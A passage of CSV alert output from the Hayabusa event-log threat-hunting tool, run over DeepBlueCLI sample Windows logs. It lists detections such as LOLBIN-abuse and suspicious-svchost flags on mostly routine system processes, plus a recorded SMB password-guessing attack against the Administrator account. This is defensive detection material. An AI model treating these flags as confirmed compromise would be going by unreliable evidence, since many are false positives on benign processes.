""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:56:55.848 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:03.208 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:07.317 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:07.473 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:32.774 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 14:57:36.030 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:09:39.097 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:09:42.379 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:09:43.691 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:22.816 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:26.441 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:58.472 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:10:58.472 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:11:06.222 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:12:04.478 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:12:15.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 15:13:03.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 15:13:03.078 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.078 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.203 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.203 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.234 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.234 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.468 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.875 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:03.875 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.515 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.515 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:04.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:05.430 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:05.758 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.211 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.211 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.290 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.290 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:06.461 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.758 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.805 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.868 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:14.961 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:15.758 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.164 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.235 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.235 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.465 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:18.465 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:20.357 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:40.443 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:40.474 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:40.505 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:14:08.521 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:14:09.193 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:15:06.588 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:15:06.635 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:21:37.109 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:21:40.687 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:11.578 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:16.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:16.078 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:22.874 +00:00,IE10Win7,4688,low,Disc,Suspicious Tasklist Discovery Command,,rules/sigma/process_creation_builtin/proc_creation_win_susp_tasklist_command.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:42.937 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:45:37.636 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:45:37.699 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:02:55.011 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:34:02.839 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:34:02.839 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:35:52.272 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:35:52.319 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:36:17.350 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:50:06.477 +00:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.513 +00:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW_PW-Guessing_Count.yml,- +2016-09-19 16:50:06.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.909 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 